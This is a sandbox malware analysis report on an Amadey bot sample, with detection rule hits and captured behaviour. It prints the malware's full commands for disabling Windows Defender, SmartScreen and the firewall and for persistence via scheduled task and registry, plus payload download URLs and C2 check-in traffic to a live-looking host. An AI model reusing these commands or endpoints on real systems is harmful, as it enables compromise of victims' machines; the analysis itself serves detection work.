    SourceRuleDescriptionAuthorStrings
    00000013.00000002.567557451.000000000167A000.00000004.00000020.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
      0000002B.00000003.466253195.00000000030D1000.00000004.00000001.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
      • 0x6330:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
      • 0x16340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
      • 0x25340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
      • 0x39ba:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x3aec:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x3b7e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x4cfa:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x584e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x62b6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x632e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x63ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x8d02:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0xf704:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0xf79a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x139ca:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x13afc:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x13b8e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x14d0a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x1585e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x162c6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x1633e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      0000003D.00000002.492202366.00000000007ED000.00000004.00000001.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
      • 0x8bd0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
      • 0x1f94:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x202a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x625a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x638c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x641e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x759a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x80ee:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x8b56:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x8bce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x8c4e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0xb5a2:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      00000050.00000003.513976385.0000000003011000.00000004.00000001.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
      • 0x6330:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
      • 0x16340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
      • 0x25340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
      • 0x39ba:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x3aec:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x3b7e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x4cfa:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x584e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x62b6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x632e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x63ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x8d02:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0xf704:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0xf79a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x139ca:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x13afc:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x13b8e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x14d0a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x1585e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x162c6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x1633e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      00000048.00000002.505878265.00000000007ED000.00000004.00000001.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
      • 0x8bd0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
      • 0x1f94:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x202a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x625a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x638c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x641e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x759a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x80ee:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x8b56:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x8bce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0x8c4e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      • 0xb5a2:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
      Click to see the 12 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Suspicius Add Task From User AppData TempShow sources
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe, ParentProcessId: 6424, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F, ProcessId: 5964
      Sigma detected: Powershell Defender ExclusionShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit), CommandLine|base64offset|contains: L\"s, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\slhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\slhost.exe, ParentProcessId: 6340, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit), ProcessId: 6696
      Sigma detected: Direct Autorun Keys ModificationShow sources
      Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 372, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\, ProcessId: 5256
      Sigma detected: Non Interactive PowerShellShow sources
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit), CommandLine|base64offset|contains: L\"s, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\slhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\slhost.exe, ParentProcessId: 6340, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit), ProcessId: 6696
      Sigma detected: T1086 PowerShell ExecutionShow sources
      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132811359910333158.6696.DefaultAppDomain.powershell

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: We7WnoqeXe.exeReversingLabs: Detection: 57%
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\vms[1].exeReversingLabs: Detection: 50%
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeReversingLabs: Detection: 50%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeJoe Sandbox ML: detected
      Source: C:\ProgramData\MicrosoftNetwork\System.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vms[1].exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\vms.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\slhost\slhost.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\slhost[1].exeJoe Sandbox ML: detected
      Source: We7WnoqeXe.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.216.1.8:443 -> 192.168.2.5:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49794 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49869 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49874 version: TLS 1.2
      Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: vms.exe, rnyuf.exe, rnyuf.exe, 00000030.00000002.462751462.0000000000CA7000.00000040.00020000.sdmp, vms.exe, 0000004A.00000002.495089954.0000000000037000.00000040.00020000.sdmp
      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: We7WnoqeXe.exe, 00000001.00000002.378299642.0000000000AE0000.00000040.00020000.sdmp
      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: slhost.exe, 0000000F.00000002.566781551.00007FF7DD0A0000.00000040.00020000.sdmp, System.exe, 00000021.00000002.567725771.00007FF7CE770000.00000040.00020000.sdmp
      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: slhost.exe, System.exe
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49790 -> 178.208.83.45:80
      May check the online IP address of the machineShow sources
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeDNS query: name: iplogger.org
      Source: C:\ProgramData\MicrosoftNetwork\System.exeDNS query: name: iplogger.org
      Source: unknownDNS query: name: iplogger.org
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/907977083509145650/vms.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/907992537824907284/vms.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 34 31 34 34 30 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=414408&un=user&dm=&av=13&lv=0
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----fa09649961c5c38096ee815c1084b2f0Host: depressionk1d.ugContent-Length: 90930Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/907992537824907284/vms.exe HTTP/1.1Host: cdn.discordapp.com
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20Host: depressionk1d.ugContent-Length: 85145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----505de9bbc17ec1c974d13a3618cbae6dHost: depressionk1d.ugContent-Length: 72800Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20Host: depressionk1d.ugContent-Length: 85145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20Host: depressionk1d.ugContent-Length: 85145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20Host: depressionk1d.ugContent-Length: 85145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20Host: depressionk1d.ugContent-Length: 85145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----4b59302975883e8abcc907d9abff9449Host: depressionk1d.ugContent-Length: 93805Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----43b66a5b34034ef1ef30ea4a95cf35b0Host: depressionk1d.ugContent-Length: 94606Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----9ab98849d7701ba45349f3258ad11878Host: depressionk1d.ugContent-Length: 94599Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----9ab98849d7701ba45349f3258ad11878Host: depressionk1d.ugContent-Length: 94599Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----9ab98849d7701ba45349f3258ad11878Host: depressionk1d.ugContent-Length: 94599Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----9ab98849d7701ba45349f3258ad11878Host: depressionk1d.ugContent-Length: 94599Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----c925e254e4791fa2143a0a21a6db1b88Host: depressionk1d.ugContent-Length: 94146Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 39 36 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39 Data Ascii: d1=1000096001&unit=152138533219
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1Host: cdn.discordapp.com
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----5eddff19410e7d4429415c2aadeac7e1Host: depressionk1d.ugContent-Length: 105439Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----5eddff19410e7d4429415c2aadeac7e1Host: depressionk1d.ugContent-Length: 105439Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0d00ed71927c3969bd11669ccebfe01aHost: depressionk1d.ugContent-Length: 105763Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ea83b8c6f62f96a069126ac2ff5dff50Host: depressionk1d.ugContent-Length: 105310Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ea83b8c6f62f96a069126ac2ff5dff50Host: depressionk1d.ugContent-Length: 105310Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d5785a5445836dca8f7ebb53840fcee7Host: depressionk1d.ugContent-Length: 95528Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6cf74e1c753ea9ca8f54f538cbca99aeHost: depressionk1d.ugContent-Length: 99801Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----cd9bcadf274a423ef14786be70bb2f2cHost: depressionk1d.ugContent-Length: 94395Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----cd9bcadf274a423ef14786be70bb2f2cHost: depressionk1d.ugContent-Length: 94395Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----cd9bcadf274a423ef14786be70bb2f2cHost: depressionk1d.ugContent-Length: 94395Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0404c211066d7a232dbda2f5b8589675Host: depressionk1d.ugContent-Length: 85133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 39 38 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39 Data Ascii: d1=1000098001&unit=152138533219
